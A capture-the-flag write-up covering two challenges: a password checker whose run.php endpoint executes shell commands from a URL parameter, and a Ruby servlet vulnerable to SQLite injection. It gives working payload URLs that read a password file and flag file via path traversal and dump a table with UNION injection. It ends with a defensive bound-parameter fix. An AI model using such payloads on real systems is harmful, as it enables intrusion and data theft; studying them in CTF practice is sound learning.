Noob, noob, noob

Password checker

Hit F12 and take a look:

function validate(objForm) {
  let toBeCheckedValue = objForm.elements['password'].value;

  // Synchronous GET (third argument false) to a server endpoint that runs a
  // shell command taken from the `cmd` parameter and returns its output; the
  // real password is fetched into the browser just to compare it client-side.
  let xmlHttp = new XMLHttpRequest();
  xmlHttp.open('GET', '/run.php?cmd=cat%20../password.txt', false);
  xmlHttp.send(null);
  let actualValue = xmlHttp.responseText;

  if (toBeCheckedValue != actualValue) {
    alert('Passwords don\'t match!');
  } else {
    alert('Password validated!');
  }
}

Then list the directory and cat the flag file: https://gycyk-zynog-bacem-ginic-mygor.capturethesquare.com/run.php?cmd=cat%20../../../../../var/www/flag.txt

line 2: flap-31aac7e26de449ee is what came back, but it was wrong. I noticed the leading "line 2", so maybe cat only read the last line of the file; I switched to head instead, one more trick learned: https://gycyk-zynog-bacem-ginic-mygor.capturethesquare.com/run.php?cmd=head -n 1 ../../../../../var/www/flag.txt

Little Doggy Tables

Downloaded the source. It's a Ruby site; grit your teeth and read it:

#!/usr/bin/env ruby

# author: Will McChesney <wmcc@squareup.com>

require "singleton"   # needed for `include Singleton` below
require "sqlite3"
require "webrick"

PORT = ARGV[0]

class SecureDatastore
  include Singleton

  def initialize
    @db = SQLite3::Database.new("secure.db")
  end

  def secure_species_lookup(insecure_codename)
    # roll our own escaping to prevent SQL injection attacks
    # (replaces ' with \' ; SQLite's only string-literal escape is a doubled
    # quote, so the value is still spliced straight into the query text)
    secure_codename = insecure_codename.gsub("'", Regexp.escape("\\'"))
    query = "SELECT species FROM operatives WHERE codename = '#{secure_codename}';"

    puts query
    results = @db.execute(query)

    return if results.length == 0   # nil when no row matches
    results[0][0]
  end
end

server = WEBrick::HTTPServer.new(Port: PORT)

trap("INT") { server.shutdown }

class AgentLookupServlet < WEBrick::HTTPServlet::AbstractServlet
  def do_GET(request, response)
    response.status = 200
    response["Content-Type"] = "text/plain"

    # a nil lookup result makes `nil + "\n"` raise, so a miss returns a 500
    response.body = SecureDatastore.instance.secure_species_lookup(request.query["codename"]) + "\n"
  end
end

server.mount "/agent_lookup", AgentLookupServlet

server.start

Skimmed it: it should be an injection. The database is sqlite3 and single quotes get escaped, but that's no big deal: put a backslash in front of the single quote and the quote breaks out. database() can't be used, but SQLite has the system table sqlite_master, so: https://little-doggy-tables.capturethesquare.com/agent_lookup?codename=\' union SELECT sql from sqlite_master-- a

CREATE TABLE operatives (
        codename TEXT,
        species TEXT,
        secret TEXT
      )

Then noob me went looking row by row… https://little-doggy-tables.capturethesquare.com/agent_lookup?codename=\' union SELECT secret from operatives limit 9,1 -- a
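Why the servlet's hand-rolled escaping does not hold against SQLite, and what the fix looks like, as an added example written for this post (not the challenge author's code). It relies on one fact: SQLite string literals have exactly one escape, a doubled quote (`''`), and a backslash inside a literal is an ordinary character. It needs only plain Ruby: `StubDb` is a stand-in I wrote for `SQLite3::Database` with the same `execute(sql, binds)` shape as the sqlite3 gem, and the codename `O'Brien` is a constructed input.

```ruby
# Added example (not the challenge author's code): the servlet's quote escaping
# versus what SQLite actually understands, plus a bound-parameter lookup.

# The servlet's escaping, reproduced as-is: turns ' into \'
def homegrown_escape(insecure_codename)
  insecure_codename.gsub("'", Regexp.escape("\\'"))
end

# The escaping SQLite understands: turns ' into ''
def sqlite_escape(insecure_codename)
  insecure_codename.gsub("'", "''")
end

# Same string building as the servlet's secure_species_lookup.
def build_query(escaped_codename)
  "SELECT species FROM operatives WHERE codename = '#{escaped_codename}';"
end

# Walk the query the way SQLite's tokenizer reads a string literal and return
# whatever text lands *after* the literal closes. For a well-formed query this
# is just ";". Returns nil if the literal never closes (a syntax error).
def sql_after_literal(query)
  open = query.index("'")
  return nil unless open
  i = open + 1
  while i < query.length
    if query[i] == "'"
      if query[i + 1] == "'"       # doubled quote: still inside the literal
        i += 2
        next
      end
      return query[(i + 1)..-1]    # literal closed here
    end
    i += 1                         # a backslash is just another character
  end
  nil
end

# Stand-in for SQLite3::Database (assumption: same execute(sql, binds) shape as
# the sqlite3 gem) so the fixed lookup runs without the gem or a database file.
# It records what the driver would receive instead of executing anything.
class StubDb
  attr_reader :last_sql, :last_binds

  def initialize(rows)
    @rows = rows
  end

  def execute(sql, binds = [])
    @last_sql = sql
    @last_binds = binds
    @rows
  end
end

# Fixed lookup: the value is bound by the driver, never spliced into the SQL.
def secure_species_lookup(db, codename)
  rows = db.execute("SELECT species FROM operatives WHERE codename = ?;", [codename])
  return if rows.empty?
  rows[0][0]
end

if __FILE__ == $0
  name = "O'Brien"   # constructed input: an ordinary codename with an apostrophe
  puts "homegrown escape leaves outside the literal: #{sql_after_literal(build_query(homegrown_escape(name))).inspect}"
  puts "sqlite escape leaves outside the literal:    #{sql_after_literal(build_query(sqlite_escape(name))).inspect}"
  db = StubDb.new([["dog"]])
  puts "bound lookup: #{secure_species_lookup(db, name)} via #{db.last_sql} with #{db.last_binds.inspect}"
end
```

Run it and the homegrown path shows `Brien';` sitting outside the string literal for a perfectly legitimate name, which is exactly the text an attacker controls; the doubled-quote path leaves only `;`, and the bound-parameter version never builds a query from user input at all, which is the change to make in the servlet.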